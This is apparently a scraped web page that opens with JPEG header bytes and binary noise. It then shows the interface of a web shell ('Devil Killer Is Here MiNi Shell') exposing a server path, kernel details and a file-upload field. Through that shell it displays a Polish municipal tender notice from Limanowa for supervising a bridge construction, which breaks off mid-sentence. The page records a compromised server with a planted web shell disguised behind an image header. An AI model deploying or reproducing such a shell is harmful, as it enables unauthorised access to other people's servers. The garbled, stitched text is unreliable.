JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211105/0025870001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego oraz nadzoru autorskiego nad realizacją zadania pn. Budowa mostu na potoku Starowiejskim w ciągu ul. Lipowej w Limanowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Limanowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893233</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Limanowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@miastolimanowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">miastolimanowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego oraz nadzoru autorskiego nad realizacją zadania pn. Budowa mostu na potoku Starowiejskim w ciągu ul. Lipowej w Limanowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-818cbd82-3e21-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00258700</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002061/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Pełnienie nadoru inwestorskiego oraz nadzoru autorskiego nad realizacją zadania pn. Budowa mostu na potoku Starowiejskim w ciągu ul. Lipowej w Limanowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami w<br/>szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa<br/>się przy użyciu środków komunikacji elektronicznej za pośrednictwem dedykowanego formularza<br/>dostępnego na ePUAP https://epuap.gov.pl/wps/portal , udostępnionego również przez miniPortal<br/>(Formularz do komunikacji) https://miniportal.uzp.gov.pl/, oraz za pośrednictwem poczty elektronicznej:<br/>sekretariat@miastolimanowa.pl<br/>2. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane<br/>w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>3. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pomocą poczty elektronicznej, na wskazany w ust. 1 adres e-mail. Sposób<br/>sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.<br/>4. Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe i przedmiotowe<br/>środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostepniającego zasoby sporządza się w<br/>postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf,<br/>.pdf, .doc, .docx, .odt.<br/>5. Ofertę, oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa się pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>6. Osoby uprawnione do komunikowania się z Wykonawcami:<br/>Agnieszka Dominik (w zakresie procedury przetargowej), tel. 183372054 wew. 179, e-mail:<br/>adominik@miastolimanowa.pl<br/>Stanisław Gorczowski (w zakresie merytorycznym) tel.183372054 wew. 152, e-mail: sgorczowski@miastolimanowa.pl<br/>7. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>10. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania za pomocą środków komunikacji elektronicznej, przy czym za datę przekazania oferty i<br/>oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp przyjmuje się datę ich przekazania na<br/>ePUAP.<br/>11. Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>12. Postępowanie odbywa się w języku polskim, w związku z czym oferta oraz wszelkie pisma,<br/>dokumenty, oświadczenia składane w trakcie postępowania między Zamawiającym a Wykonawcami<br/>muszą być sporządzone w języku polskim. Dokumenty sporządzone w języku obcym są składane wraz<br/>z tłumaczeniem na język polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Limanowa, z siedzibą: 34-600<br/>Limanowa, ul. Jana Pawła II 9<br/>• z inspektorem ochrony danych osobowych w Urzędzie Miasta Limanowa można skontaktować się<br/>pod adresem e-mail: iod@miastolimanowa.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonym w trybie przetargu nieograniczonego<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz<br/>art. 96 ust. 3 ustawy Pzp<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1<br/>ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp • w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym<br/>skorzystanie z tego prawa nie może skutkować zmianą wyniku niniejszego postępowania, zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp, ani nie może naruszać integralności<br/>protokołu z postępowania o udzielenia zamówienia publicznego i załączników do protokołu;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo to<br/>nie ma zastosowania w odniesieniu do przechowywania w celu zapewnienia możliwości korzystania za<br/>środków ochrony prawnej;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.271.1.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest pełnienie funkcji Inspektora nadzoru inwestorskiego oraz nadzoru<br/>autorskiego dla zadania pn. Budowa mostu na potoku Starowiejskim w ciągu ul. Lipowej w<br/>Limanowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71631300-3 - Usługi technicznego nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">33 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ustala się następujące kryteria oceny ofert:<br/>- cena ofertowa brutto – znaczenie: 60 pkt <br/>- czas na podjęcie działań w momencie nieprzewidzianych zdarzeń wymagających obecności<br/>inspektora nadzoru na terenie budowy – znaczenie: 40 pkt (nie mniej niż 24 godz. i nie więcej niż 48<br/>godz.)<br/>Maksymalną ilość punktów w kryterium czas na podjęcie działań w momencie nieprzywidzianych<br/>zdarzeń wymagających obecności inspektora nadzoru na terenie budowy otrzyma oferta wykonawcy,<br/>który zaoferuje najkrótszy czas (podany w godzinach) od zgłoszenia przedstawiciela Zamawiającego.<br/>Minimalny możliwy do zaoferowania czas na podjęcie działań to 24 godz, a maksymalny możliwy do<br/>zaoferowania czas na podjęcie działań to 48 godz.<br/>W przypadku zaoferowania krótszego czasu, niż minimalny dopuszczony zgodnie z SIWZ,<br/>Zamawiający w celu oceny oferty w niniejszym kryterium przyjmie, że wykonawca oferuje czas na<br/>podjęcie działań równy minimalnemu, ale wykonawca zobowiązany będzie do podjęcia działań w<br/>czasie, który zaoferował.<br/>W przypadku zaoferowania czasu na podjęcie działań dłuższego niż maksymalny możliwy do<br/>zaoferowania, Zamawiający odrzuci ofertę jako niezgodną z SIWZ. Jeżeli wykonawca nie określi w<br/>formularzu ofertowym czasu na podjęcie działań, Zamawiający przyjmie, że wykonawca oferuje<br/>maksymalny możliwy do zaoferowania czas<br/>KC = CN/COB x 60 + (48 - TOB)/24 x 40<br/>Gdzie:<br/>KC - ilość punktów przyznanych Wykonawcy<br/>CN - najniższa zaoferowana cena w PLN, spośród wszystkich ofert nie podlegających odrzuceniu<br/>COB - cena w PLN zaoferowana w ofercie badanej<br/>2. Maksymalna łączna liczba punktów jaką może uzyskać Wykonawca wynosi – 100 pkt.<br/>3. Zamawiający wybierze ofertę najkorzystniejszą, która uzyska największą liczbę punktów.<br/>4. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru oferty najkorzystniejszej ze względu<br/>na to, że dwie lub więcej ofert przedstawi taki sam bilans ceny i innych kryteriów oceny ofert,<br/>Zamawiający zastosuje procedurę określoną w art. 248 ustawy Pzp.<br/>5. Jeżeli zaoferowana przez Wykonawcę cena lub jej istotne części składowe, będą wydawały się<br/>rażąco niskie w stosunku do przedmiotu zamówienia lub będą budzić wątpliwości Zamawiającego co<br/>do możliwości wykonania zmówienia Zamawiający zażąda od Wykonawcy wyjaśnień, w tym złożenia<br/>dowodów w zakresie wyliczenia ceny, zgodnie z art. 224 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas na podjęcie działań w momencie nieprzewidzianych zdarzeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy spełniają warunki<br/>określone w art. 112 ust. 2 ustawy Pzp, dotyczące:<br/>a) zdolność występowania w obrocie gospodarczym - Zamawiający nie określa szczegółowego<br/>warunku w tym zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, ile wynika to<br/>z odrębnych przepisów - Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>c) sytuacji ekonomicznej lub finansowej: są ubezpieczeni od odpowiedzialności cywilnej w<br/>zakresie działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100 000,00 zł<br/>(słownie złotych: sto tysięcy 00/100);<br/>d) zdolności technicznej lub zawodowej: dysponują lub będą dysponować osobami<br/>skierowanymi przez Wykonawcę do realizacji zamówienia w szczególności nadzorowania robót<br/>budowlanych, w tym przynajmniej:<br/>Inspektor nadzoru w branży mostowej, który musi posiadać następujące kwalifikacje:<br/>- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi<br/>w specjalności mostowej lub odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów.<br/>- minimum 5 ‐ letnie doświadczenie zawodowe, w tym minimum 3 lata przy pełnieniu<br/>samodzielnych funkcji technicznych (kierownik budowy lub kierownik robót lub inspektor<br/>nadzoru) w zakresie robót mostowych,<br/>Wymóg posiadania 5-letniego doświadczenia dla osób, które będą wykonywać zamówienie,<br/>weryfikowany będzie na etapie oceny spełnienia warunków udziału<br/>w postępowaniu w stosunku do Wykonawcy, który złożył ofertę najkorzystniejszą. Wykonawca<br/>będzie zobowiązany podać ten okres w miesiącach wraz z informacją<br/>o nazwach inwestycji oraz pełnionej funkcji. Okresy zrealizowanych inwestycji, które na siebie<br/>nachodzą nie podlegają sumowaniu.<br/>Inspektor nadzoru w branży drogowej, który musi posiadać uprawnienia budowlane do<br/>kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów.<br/>Inspektor nadzoru w branży elektrycznej, który musi posiadać uprawnienia budowlane w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych do kierowania robotami budowlanymi bez ograniczeń lub odpowiadające<br/>im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów<br/>Inspektor nadzoru w branży sanitarnej i gazowej, który musi posiadać uprawnienia budowlane w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi bez<br/>ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów<br/>Inspektor nadzoru w branży telekomunikacyjnej, który musi posiadać uprawnienia budowlane w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych do<br/>kierowania robotami budowlanymi bez ograniczeń lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, o których mowa w art. 273 ust. 1 ustawy Pzp:<br/>1) informacja z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp,<br/>sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020r. poz. 1076 z póżn. zm.), z innym Wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego<br/>do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik Nr 4 do SWZ;<br/>3) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108<br/>ust. 1 pkt 3 ustawy Pzp. tj. o braku prawomocnego wyroku sądu lub ostatecznej decyzji<br/>administracyjnej o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne<br/>lub zdrowotne, albo oświadczenia, że Wykonawca przed terminem składania ofert dokonał płatności<br/>należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami<br/>lub grzywnami lub że zawarł wiążące porozumienie w sprawie spłaty tych należności. Wzór<br/>oświadczenia stanowi Załącznik Nr 